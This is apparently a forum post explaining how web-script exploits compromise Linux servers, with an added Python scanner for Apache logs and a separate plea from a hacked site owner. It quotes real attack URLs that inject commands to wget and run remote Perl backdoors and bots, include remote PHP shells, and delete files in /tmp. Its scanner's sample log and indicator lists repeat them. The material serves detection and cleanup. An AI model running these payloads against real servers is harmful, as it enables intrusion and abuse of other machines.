
The most common compromise of a dedicated server is a script exploit that gives the attacker non-root access to the box. Many times it is well known in the community which scripts are vulnerable, and they get fixed. For example, at one time phpBB was vulnerable and any version older than xx could be exploited. Following that it was AWStats, and the list goes on.
What the attacker does is pass the script some variables and commands in an HTTP URL. The vulnerability is that the script takes those values and hands them to PHP's eval(), to a system shell, or to an include() that will happily fetch a remote file, so the attacker's commands get run with the web server's privileges.
Here are a few examples:
/misc.php?do=page&template={${system("cd%20/tmp;wget%20http://shop.rjp.ca/images/canalshell/bd/dc;%20chmod%20777%20dc.pl%20;%20perl%20dc.pl;%20dc.pl%20201.8.188.152%204222")}}
//include/print_category.php?setup%5Buse_category%5D=1/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.bh-net.dk/cmd2.gif?&cmd=uname%20-a%20;%20id HTTP/1.1
You can see the attacker puts a few commands in the URL, plus the address of another script they want pulled onto the server. In the first example a PHP expression is injected into the template parameter; when the script evaluates that template, the embedded system() call changes to /tmp, downloads a Perl script with wget, makes it executable and runs it, passing it an IP address and port. In the second example the dir parameter ends up in an include(), so the attacker points it at his own server, and the "gif" is really PHP code that runs whatever is in the cmd parameter (here uname -a and id, to learn what the box is and which user they are). Once they have one command running they can upload more scripts and run more commands, and so on.
All of this happens as the user Apache (httpd) runs under, which is usually nobody. That user normally cannot write anywhere except /tmp (and other world-writable places such as /var/tmp and /dev/shm, or a web directory that was carelessly chmod'ed), so most of the attacker's files and scripts are found in /tmp.
The next thing the attacker usually does is upload an IRC bot so they can chat and show off that they have hacked the server. Then they usually upload scanning tools or DDoS (flooding) tools and either scan other servers for the same holes or start a DDoS attack against another server.
The good news is they don't have root access, so once you remove all their files and stop all their processes (a reboot kills the processes, but you still have to delete the files) they are gone. That assumes they did not go on to escalate to root with a local exploit; if anything outside the web user's reach has been changed, treat the box as fully compromised. However, if you don't find and fix the vulnerable script they will come right back.
So how do you find the script? Well, that's the hard part. Sometimes there is a community-wide problem, as mentioned above with phpBB and AWStats, so you know exactly what you need to update or upgrade. However, many times these are custom or one-off scripts that have a vulnerability. If you are not a programmer and don't have time to go through every PHP script on your server, the next best bet is to go through all your httpd access logs and look for URLs that resemble the ones posted above. Keep in mind the name of the script will probably not be the same, but the shape of the URL will be similar and unlike everything else in the logs: a query string full of %20, semicolons or pipes, command names like wget or perl, or a parameter whose value is a URL on some other host. Note that the access log only records the request line, so a payload sent in a POST body will not show up there; for those you need mod_security's audit log or the web server's own error log. Grepping through logs is time-consuming and tedious, but it is really the only way.
Once you find the script you can fix it by reprogramming it (validate the input and never pass it to a shell, eval() or include()), update it to a fixed version, or delete it. You can also install mod_security into Apache, which will block most of these PHP/command-injection attempts, but treat it as a second layer rather than a fix: the hole is still there underneath it. If you have a cPanel server it is available for free as an add-on.
Here are the latest attempts going around to get in via AWStats. The value of the configdir parameter ends up in a Perl open() call, so wrapping it in pipe characters (|...|) makes Perl run it as a shell command:
/stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.members.lycos.co.uk/adisef/newbot;perl%20netsky;echo%20;rm%20-rf%20netsky*;echo| HTTP/1.1
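The following is an added example, not code from the original post, of the log search described above applied to the PHP examples and to this AWStats line. It parses Apache common/combined log lines, percent-decodes the request target (repeating so a double-encoded payload cannot hide), and flags a request when a parameter's value is a remote URL, or when at least two of these classes appear together: shell command names, command separators (; | `), and PHP execution functions. The sample log lines are constructed here from the request strings quoted in the post (the literal quotes in the first one are written as %22 so the line parses like a real log entry), and the indicator lists are an assumed starting set to extend from your own logs, not a complete signature set.

```python
import re
import sys
from urllib.parse import unquote_plus

# Request line of an Apache common/combined log entry. Only the client IP,
# timestamp and the request target (path plus query string) are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Indicator classes checked against the *decoded* target. This is an assumed
# starting set chosen to match the request strings quoted in the post.
INDICATORS = {
    "shell command": re.compile(
        r"\b(wget|curl|lynx|fetch|perl|python|chmod|killall|uname|rm)\b", re.I),
    "command separator": re.compile(r"[;|`]"),
    "php code execution": re.compile(
        r"\b(system|exec|shell_exec|passthru|eval)\s*\(", re.I),
    # a parameter whose value is a URL on another host: remote file inclusion
    "remote file inclusion": re.compile(r"[?&][^&=]*=\s*(?:https?|ftp)://", re.I),
}


def decode_target(target: str, rounds: int = 3) -> str:
    """Percent-decode the target, repeating to undo double encoding
    (%2520 -> %20 -> space) so an encoded payload still hits the regexes."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(target: str) -> list[str]:
    """Names of the indicator classes present in the decoded target."""
    decoded = decode_target(target)
    return [name for name, rx in INDICATORS.items() if rx.search(decoded)]


def is_suspicious(indicators: list[str]) -> bool:
    """A remote URL in a parameter is suspicious on its own; otherwise demand
    two independent classes so a search for 'how to install perl' is not flagged."""
    return "remote file inclusion" in indicators or len(indicators) >= 2


def scan_log(lines) -> list[dict]:
    """Parse each log line and return the suspicious requests with their indicators."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not a request line in the expected format; skip it
        indicators = classify(m["target"])
        if is_suspicious(indicators):
            hits.append({"ip": m["ip"], "time": m["time"],
                         "target": decode_target(m["target"]),
                         "indicators": indicators})
    return hits


# Constructed sample log. Lines 1-3 carry the request strings quoted in the
# post; lines 4-6 are ordinary traffic that must not be flagged.
SAMPLE_LOG = [
    '10.0.0.1 - - [12/Mar/2006:03:14:07 +0000] "GET /misc.php?do=page&template={${system(%22cd%20/tmp;wget%20http://shop.rjp.ca/images/canalshell/bd/dc;%20chmod%20777%20dc.pl%20;%20perl%20dc.pl%22)}} HTTP/1.1" 200 1843 "-" "Mozilla/4.0"',
    '10.0.0.2 - - [12/Mar/2006:03:15:22 +0000] "GET /include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.bh-net.dk/cmd2.gif?&cmd=uname%20-a%20;%20id HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '10.0.0.3 - - [12/Mar/2006:03:16:41 +0000] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;wget%20www.members.lycos.co.uk/adisef/newbot;perl%20netsky;echo%20;rm%20-rf%20netsky*;echo| HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [12/Mar/2006:03:20:00 +0000] "GET /forum/viewtopic.php?t=1234&start=15 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [12/Mar/2006:03:20:05 +0000] "GET /images/logo.gif HTTP/1.1" 200 3200 "http://example.org/" "Mozilla/5.0"',
    '192.0.2.12 - - [12/Mar/2006:03:21:30 +0000] "GET /search.php?q=how+to+install+perl HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    # With a file argument scan that log; otherwise run over the built-in sample.
    source = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG
    for hit in scan_log(source):
        print(f"{hit['ip']} {hit['time']} [{', '.join(hit['indicators'])}]")
        print(f"    {hit['target']}")
```

Run it as `python3 scan.py /var/log/httpd/access_log` (the file name is whatever your distribution uses). Decoding before matching is the important part: grepping the raw log for `cd /tmp` misses `cd%20/tmp`, and the two-class threshold keeps a legitimate query that happens to mention perl from drowning the real hits.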

My site has been hacked recently by injecting the following script. This script starts downloading malware/badware as soon as the page is resolved in the browser. The hosting guys say they cannot do anything about it and requested a script upgrade.
The site was built using PHP 4. Google has blocked the site following this attack. I have removed all those script files and uploaded the clean ones, but the site is still vulnerable to such attacks.
Somebody may please let me know the solutions.
I need some solutions to protect my site from such malicious attacks.